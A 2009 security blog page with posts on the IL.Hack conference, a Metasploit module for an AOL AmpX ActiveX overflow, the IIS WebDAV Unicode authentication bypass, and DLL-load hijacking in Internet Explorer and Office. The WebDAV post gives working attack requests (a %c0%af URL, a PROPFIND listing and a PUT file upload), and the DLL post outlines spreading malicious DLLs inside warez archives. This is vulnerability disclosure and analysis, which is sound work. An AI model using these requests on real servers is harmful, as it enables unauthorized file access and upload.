Posted by Trancer on May 31 2009
 A week ago on Sunday I’ve attended IL.Hack – the Israeli hacking convention for 2009. I really enjoyed the convention and I think the Israeli hacking community need this kind of event at least once a year. I’d like to thank Yaniv Meron (Lament), the convention entrepreneur and organizer for making it all happen. I sure was skeptical about this convention at first but it turned out to be great.
The best part of the convention for me was meeting everyone, either if it’s people I’ve already knew or new people I’ve met, making new connections and sharing information.
The lectures was not as professional as I’d expect them to be but hey, I guess when you plan a lecture to a variety of people with different levels of knowledge it can’t be truly hardcore.
The first lecture by Jonathan Klinger (blog) about hacker films and the hacker image was really awful in my opinion. Klinger didn’t pass the point of the lecture quite well, his presentation was far from being done and he always got mixed up with the movie snippets he wanted to show. The second lecture by Yaniv Meron about Steganography was too basic in my opinion. Yaniv demonstrate two messages hiding techniques, the first was hiding a message within a bitmap file and the second within a sound file. I can compare it to a lecture about Cryptography demonstrating something as basic as Caesar cipher. Yaniv didn’t show any tools that can be used for Steganography (both hiding and unhiding data), didn’t talk about the history of Steganography science and didn’t give any mitigation techniques and protections against Steganography attacks (for example, stealing data from your company). Anyway, I didn’t went to the rest of the lectures, I heard the third one about web sites security was also very basic, demonstrating plain XSS and CSRF attacks. But, I also heard the last two lectures were good.
To sum it up, IL.Hack 2009 was great, I had a lot of fun and I hope next year it will be even more.
See you on IL.Hack 2010.
Press and buzz: (Hebrew)
IL.Hack 2009 web site.
Calcalist.
Calcalist (second article).
Newsgeek.
Crictor (and in Hebrew).
Crictor – Interview with Avi Weissman (IFIS, See Security).
iTK98’s blog.
Channel 1 (mms streaming – minute 33).
Pictures by An7i and me.
Also, search #ilhack and #ilhack2009 on Twitter.
Categories: Rec-Sec
      
0 Comments |  Comments RSS |  TrackBack URL
Posted by Trancer on May 24 2009
 Wrote a new Metaspoit exploit module for the AOL Radio AmpX ActiveX control ConvertFile() stack-based buffer overflow vulnerability.
This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website. By setting an overly long value to ‘ConvertFile()’, an attacker can overrun a buffer and execute arbitrary code.
This vulnerability was found by rgod and was published recently by Nine:Situations:Group. Still no patch from AOL, if you want to test it you can get the vulnerable package here on the AOL Radio web site.
Download aol_ampx_convertfile.rb.
Also on Metasploit.
References:
BID 35028
OSVDB 54706
milw0rm 8733
Categories: Exploits, Metasploit
0 Comments | Comments RSS | TrackBack URL
Posted by Trancer on May 21 2009
 Now this is a classy, few days ago Kingcope (Nicolaos Rangos) disclosed a remote authentication bypass vulnerability in Microsoft IIS 6 WebDAV service. In the advisory Kingcope details some of this vulnerability attack vectors, such as reading files within password protected folders and directory listing password protected WebDAV folders. It is also possible to upload files to a WebDAV protected folders in some server configurations. This vulnerability is possible because WebDAV fails to properly handle Unicode character ‘/’ (%c0%af).
This reminds me of the good old Microsoft IIS 4/5 Unicode vulnerability, which was used to mass-own the Internet back in 2000-2001, what a fun vulnerability it was ^_^.
Microsoft have released a security advisory (971492) and the SRD team published two posts clearing a lot of this vulnerability details:
More information about the IIS authentication bypass.
Answers to the IIS WebDAV authentication bypass questions.
Here’s a summary of the details so far:
- Microsoft IIS 5.0 (Windows Server 2000), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003) are vulnerable.
- Microsoft IIS 7.0 (Windows Server 2008) is safe.
- To exploit this vulnerability, WebDAV service must be enabled.
- WebDAV is disabled by default in IIS 6.0.
- To exploit this vulnerability, IIS server must use IIS permissions to restrict a subfolder of content to authenticated users.
- IIS server that doesn’t use IIS permissions to restrict content to authenticated users is safe.
- To exploit this vulnerability, file system access must be granted for the restricted content to the IUSR_[MachineName] account.
- IIS server that does not grant filesystem access to the IUSR_[MachineName] account is safe.
- A parent folder of the private subfolder must allow anonymous access.
- The vulnerability effects websites implementing basic, digest, or integrated windows authentication (NTLM).
- IIS server that hosts web applications using only forms-based authentication is safe.
- If the IUSR_[MachineName] account has write access to WebDAV folders, it is possible to upload content to the web server.
- Microsoft SharePoint Server is safe.
- Microsoft Outlook Web Access (OWA) Server is safe.
Exploiting the WebDAV remote authentication bypass vulnerability
Authentication bypass of password protected folders:
http://www.vulnerable.com/webdav%c0%af/sensitive.zip
Directory listing of password protected folders:
PROPFIND /web%c0%afdav/ HTTP/1.1
Host: www.vulnerable.com
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
Writing files to password protected folders:
PUT /web%c0%afdav/foo.html HTTP/1.1
Host: www.vulnerable.com
Translate: f
Content-Length: 15
Content-Type: text/html
<h1>w00t!!</h1>
Testing tools
Further information
That’s it for now, great find by kcope indeed.
Updates:
>> Check out this blog post by Todd Manning of BreakingPoint Labs – ‘Slash’ and Burn – The IIS 6.0 WebDAV Bug – Gives interesting information about this vulnerability and IDS/IPS signature evasion techniques.
In addition, ET added an HTTP WebDAV Scanner to Metasploit – wmap_dir_webdav_unicode_bypass.rb.
From SANS ISC Diary – IIS admins, help finding WebDAV remotely using nmap.
>> From Thierry Zoller – the IIS WebDAV Unicode vulnerability also allows to bypass IP address and domain name restrictions configurations. This keeps getting better and better… :-)
>> WebDAV unicode vulnerability overview by Steve Friedl – Understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV Vulnerability.
>> Microsoft patch IIS WebDAV Unicode authentication bypass vulnerability – MS09-020.
It’s about time.
Categories: Vulnerabilities
3 Comments | Comments RSS | TrackBack URL
Posted by Trancer on May 12 2009
A month ago on Black Tuesday of April 2009, Microsoft patched a handful of vulnerabilities, some of them are known for quite some time now.
In this post I’ll talk about one vulnerability in particular – the DLL-load hijacking vulnerability in Microsoft Internet Explorer 7 which was found by Aviv Raff on October 2006.
The DLL-load hijacking vulnerability allows loading specific DLL files (imageres.dll, schannel.dll and sqmapi.dll) from the desktop when running Internet Explorer. An attacker may leverage this vulnerability to execute arbitrary code in the context of the application by placing a specially crafted DLL file on a user’s desktop.
So why Microsoft did patch a security bug after two and a half years? Well, that’s a long story.
At first, Microsoft issued this vulnerability as a “bad behavior” bug and although Aviv’s warnings they didn’t relate any security considerations to this issue. Microsoft stated that if an attacker was able to create a specially crafted DLL file on a user desktop, that desktop must have already been compromised. Then on December 2006, Aviv published a PoC exploit code for the vulnerability on milw0rm and still, no patch from Microsoft. Even on April 2008 when Windows XP SP3 was released, Microsoft hasn’t provided a solution or a workaround of any kind for this issue.
On May 2008, Nitesh Dhanjani detailed several vulnerabilities found in Apple Safari, one of them was the “Safari Carpet Bomb” vulnerability, which enabled an attacker to force the browser to download files without the user’s consent. The default download path of Apple Safari for Windows is the user desktop.
Combining the DLL-load hijacking vulnerability and the Safari Carpet Bomb vulnerability, Aviv was able to prove a fully automated remote code execution attack. With the help of Ryan Naraine, Microsoft and Apple started taking these issues seriously after the two sent Microsoft the proof-of-concept. Microsoft released a security advisory for this “blended threat” and eventually on June 2008, Apple fixed the Safari Carpet Bomb vulnerability.
And then on April 2009, two and a half years after Aviv reported this issue, Microsoft finally patched the DLL-load hijacking vulnerability.
You can read a detailed disclosure timeline on this blog post by Aviv Raff. Further information regarding this “blended threat” can be found on CVE-2008-2540 and BID 29445.
To mitigate this issue, Microsoft released two patches:
MS09-014 – which is a cumulative security update for Internet Explorer. Regarding the DLL-load hijacking vulnerability, this patch modifies the way Internet Explorer loads files from the desktop.
MS09-015 – providing additional defense in depth protections, with this patch Microsoft introduced a new API – SetSearchPathMode which sets the per-process mode when using the SearchPath function to locate files, allows applications to force the current directory to be searched after the application and system locations.
Additional information about these patches can be found in the security bulletins and in this post on the Microsoft Security Research & Defense blog.
And now for the interesting part, what Microsoft DON’T want you to know.
As stated on the MS09-014 security bulletin, the DLL-load hijacking vulnerability affects Internet Explorer 7 and lower versions. Internet Explorer 8 users are immune to this vulnerability, Microsoft claims.
This statement is not true, Internet Explorer 8 (RTM, build 8.0.6001.18702) is, in fact, vulnerable to the DLL-load hijacking vulnerability. Not only that, this is not the only vulnerability patched in MS09-014 that affect Internet Explorer 8, but that’s a subject for another blog post.
Here’s a video demonstrating the attack on IE8 – ie8_dll_hijack.swf.
Also, Internet Explorer is not the only application vulnerable to the DLL-load hijacking vulnerability. Almost every Microsoft application I’ve tested is vulnerable and also some third party applications. For example, Microsoft Office 2007 is vulnerable.
Here’s a video demonstrating the attack on Microsoft Office Word 2007 – office_dll_hijack.swf.
As I mentioned, at first Microsoft didn’t consider this issue to be a security vulnerability due to the fact that an attacker would have to create a specially crafted DLL file on a user’s computer to exploit it. Well, I can come up with many ways to leverage this attack, for example, using P2P file sharing applications and protocols, such as BitTorrent. Attackers can distribute warez (movies, software, books and etc’) packed to a ZIP or a RAR file, add to the package a malicious DLL file and a readme .html or .doc file (or both). Once the victim downloads the malicious package and opens the readme file – GAME OVER.
So, does Microsoft lie in security bulletins to their customers? They probably are… Have a happy Black Tuesday! :-)
Categories: Vulnerabilities
11 Comments | Comments RSS | TrackBack URL
|
RSS 2.0
ATOM 1.0
RDF 1.0
Links OPML
OpenSearch
